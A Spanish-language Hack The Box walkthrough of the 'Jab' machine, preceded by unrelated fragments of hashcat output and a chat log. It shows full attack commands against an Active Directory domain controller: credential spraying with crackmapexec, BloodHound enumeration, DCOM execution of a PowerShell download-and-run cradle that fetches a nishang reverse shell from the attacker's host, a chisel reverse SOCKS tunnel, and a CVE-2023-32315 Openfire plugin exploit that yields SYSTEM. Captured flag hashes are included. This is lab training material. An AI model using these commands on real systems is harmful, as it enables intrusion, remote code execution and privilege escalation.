Restore.Point....: 14336000/14344385 (99.94%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: $HEX[2321686f74746965] -> $HEX[042a0337c2a156616d6f732103]

Started: Fri Oct 27 15:30:09 2023
Stopped: Fri Oct 27 15:30:29 2023

[14:31:57] <adunn> I'll pass this along and circle back with the group 
[14:32:23] <bdavis> perfect, thanks Angela! 
[13:22:55] *** The topic has been set to

svc_openfire - User

Creds

svc_openfire tiene acceso por XMPP y parece ser administrador, sin embargo no encontramos informacion util tras enumerar las salas de chat. Verificamos por samba, winrm y ldap el acceso de este usuario, observamos unicamente por smb.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10

 π ~/htb/jab ❯ crackmapexec smb 10.10.11.4 -u svc_openfire -p '!@#$%^&*(1qazxsw'
SMB         10.10.11.4      445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:jab.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.4      445    DC01             [+] jab.htb\svc_openfire:!@#$%^&*(1qazxsw
 π ~/htb/jab ❯ crackmapexec winrm 10.10.11.4 -u svc_openfire -p '!@#$%^&*(1qazxsw'
SMB         10.10.11.4      5985   DC01             [*] Windows 10.0 Build 17763 (name:DC01) (domain:jab.htb)
HTTP        10.10.11.4      5985   DC01             [*] http://10.10.11.4:5985/wsman
WINRM       10.10.11.4      5985   DC01             [-] jab.htb\svc_openfire:!@#$%^&*(1qazxsw
 π ~/htb/jab ❯ crackmapexec ldap 10.10.11.4 -u svc_openfire -p '!@#$%^&*(1qazxsw'
SMB         10.10.11.4      445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:jab.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.4      445    DC01             [-] jab.htb\svc_openfire:!@#$%^&*(1qazxsw Error connecting to the domain, are you sure LDAP service is running on the target ?

BloodHound

Ejecutamos bloodhound-python con las credenciales de svc_openfire obteniendo toda la informacion y comprimiendo en zip para importar a bloodhound.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25

 π ~/htb/jab ❯ bloodhound-python -u svc_openfire -p '!@#$%^&*(1qazxsw' -d jab.htb -dc dc01.jab.htb -ns 10.10.11.4 -c all --zip
INFO: Found AD domain: jab.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.jab.htb
WARNING: LDAP Authentication is refused because LDAP signing is enabled. Trying to connect over LDAPS instead...
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 502 computers
INFO: Connecting to LDAP server: dc01.jab.htb
WARNING: LDAP Authentication is refused because LDAP signing is enabled. Trying to connect over LDAPS instead...
INFO: Found 2687 users
INFO: Found 162 groups
INFO: Found 2 gpos
INFO: Found 21 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: LPTP-0212.jab.htb

[...]

WARNING: Could not resolve: HK-0639.jab.htb: The DNS query name does not exist: HK-0639.jab.htb.
INFO: Done in 00M 38S
INFO: Compressing output into 20240318200527_bloodhound.zip
 π ~/htb/jab ❯

En Bloodhound observamos que el usuario svc_openfire tiene acceso DCOM a DC01.JAB.HTB.

image

DCOM

Utilizamos dcomexec de impacket para ejecutar un ping a nuestra maquina, se especifica -nooutput para no realizar una conexion por smb y el objeto MMC20 ya que el objeto por default no funciono.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10

 π ~/htb/jab ❯ impacket-dcomexec -nooutput -object MMC20 -dc-ip 10.10.11.4 -debug 'jab.htb/svc_openfire:!@#$%^&*(1qazxsw@10.10.11.4' "ping 10.10.14.143"
Impacket v0.11.0 - Copyright 2023 Fortra

[+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
[+] Target system is 10.10.11.4 and isFQDN is False
[+] StringBinding: DC01[59930]
[+] StringBinding: 10.10.11.4[59930]
[+] StringBinding chosen: ncacn_ip_tcp:10.10.11.4[59930]

 π ~/htb/jab ❯

Observamos multiples solicitudes a nuestra maquina.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12

 π ~/htb/jab ❯ sudo tcpdump -i tun1 icmp
[sudo] password for kali:
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun1, link-type RAW (Raw IP), snapshot length 262144 bytes
22:37:22.551933 IP jab.htb > 10.10.14.143: ICMP echo request, id 1, seq 60, length 40
22:37:22.551946 IP 10.10.14.143 > jab.htb: ICMP echo reply, id 1, seq 60, length 40
22:37:23.567997 IP jab.htb > 10.10.14.143: ICMP echo request, id 1, seq 61, length 40
22:37:23.568012 IP 10.10.14.143 > jab.htb: ICMP echo reply, id 1, seq 61, length 40
22:37:24.572121 IP jab.htb > 10.10.14.143: ICMP echo request, id 1, seq 62, length 40
22:37:24.572136 IP 10.10.14.143 > jab.htb: ICMP echo reply, id 1, seq 62, length 40
22:37:25.623355 IP jab.htb > 10.10.14.143: ICMP echo request, id 1, seq 63, length 40
22:37:25.623372 IP 10.10.14.143 > jab.htb: ICMP echo reply, id 1, seq 63, length 40

Shell

Ejecutamos una shell de nishang.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10

 π ~/htb/jab ❯ impacket-dcomexec -nooutput -object MMC20 -dc-ip 10.10.11.4 -debug 'jab.htb/svc_openfire:!@#$%^&*(1qazxsw@10.10.11.4' "powershell.exe -c iex(new-object net.webclient).downloadstring('http://10.10.14.143/nishang.ps1')"
Impacket v0.11.0 - Copyright 2023 Fortra

[+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
[+] Target system is 10.10.11.4 and isFQDN is False
[+] StringBinding: DC01[59966]
[+] StringBinding: 10.10.11.4[59966]
[+] StringBinding chosen: ncacn_ip_tcp:10.10.11.4[59966]

 π ~/htb/jab ❯

Tras la ejecucion obtuvimos aceso como svc_openfire y realizamos la lectura de la flag user.txt.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22

 π ~/htb/jab ❯ rlwrap nc -lvp 1335
listening on [any] 1335 ...
connect to [10.10.14.143] from jab.htb [10.10.11.4] 59968
Windows PowerShell running as user DC01$ on DC01
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\windows\system32>whoami
jab\svc_openfire
PS C:\windows\system32> dir c:/users/svc_openfire/desktop


    Directory: C:\users\svc_openfire\desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        3/18/2024   8:51 PM             34 user.txt


PS C:\windows\system32> cat c:/users/svc_openfire/desktop/user.txt
69de5daccc4b041743630180d80d175c
PS C:\windows\system32>

Privesc

Anteriormente descubrimos OpenFire, observamos que el puerto 9090 esta localmente a la escucha.

1
2
3

PS C:\windows\system32>netstat -ano | findstr 9090
  TCP    127.0.0.1:9090         0.0.0.0:0              LISTENING       1048
PS C:\windows\system32>

Socks Proxy

Ejecutamos chisel para realizar la ejecucion de un reverse SOCKS proxy.

1
2
3
4
5

# server - kali
./chisel server -p 7070 --reverse

# client - box
./chisel.exe client 10.10.10.10:7070 R:socks

En FoxyProxy agregamos un nuevo item con la configuracion para Socks.

image

Observamos el panel de OpenFire en el puerto 9090 y ademas tenemos acceso con las credenciales de svc_openfire.

image

image

CVE-2023-32315

Tras investigar alguna vulnerabilidad en OpenFire encontramos que es posible la ejecucion remota de comandos, en este caso ya tenemos acceso a una cuenta por lo que unicamente necesitamos el plugin, clonamos el repositorio CVE-2023-32315.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12

 π ~/htb/jab ❯ git clone https://github.com/miko550/CVE-2023-32315.git
Cloning into 'CVE-2023-32315'...
remote: Enumerating objects: 31, done.
remote: Counting objects: 100% (31/31), done.
remote: Compressing objects: 100% (29/29), done.
remote: Total 31 (delta 15), reused 0 (delta 0), pack-reused 0
Receiving objects: 100% (31/31), 38.13 KiB | 6.35 MiB/s, done.
Resolving deltas: 100% (15/15), done.
 π ~/htb/jab ❯ cd CVE-2023-32315
 π CVE-2023-32315 main ❯ ls
CVE-2023-32315.py  openfire-management-tool-plugin.jar  README.md  requirements.txt
 π CVE-2023-32315 main ❯

Cargamos el plugin en Plugins.

image

Observamos y accedimos al plugin instalado con la contrasena 123.

image
image

Observamos multiples opciones, nos interesa “system command” donde ejecutamos un whoami y observamos que se ejecuta como system.

image

Shell

Ejecutamos una shell inversa con nishang, logramos acceder como system y realizar la lectura de la flag root.txt.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23

 π ~/htb/jab ❯ rlwrap nc -lvp 1335
listening on [any] 1335 ...
connect to [10.10.14.143] from jab.htb [10.10.11.4] 60221
Windows PowerShell running as user DC01$ on DC01
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Program Files\Openfire\bin>whoami
nt authority\system
PS C:\Program Files\Openfire\bin> cd C:/users/administrator/desktop
PS C:\users\administrator\desktop> dir


    Directory: C:\users\administrator\desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        3/18/2024   8:51 PM             34 root.txt


PS C:\users\administrator\desktop> cat root.txt
3db06818b977511b73d20d76e85a5550
PS C:\users\administrator\desktop>
Share on
Dany Sucuc
WRITTEN BY
sckull
RedTeamer & Pentester wannabe

Read other posts

HackTheBox - Jab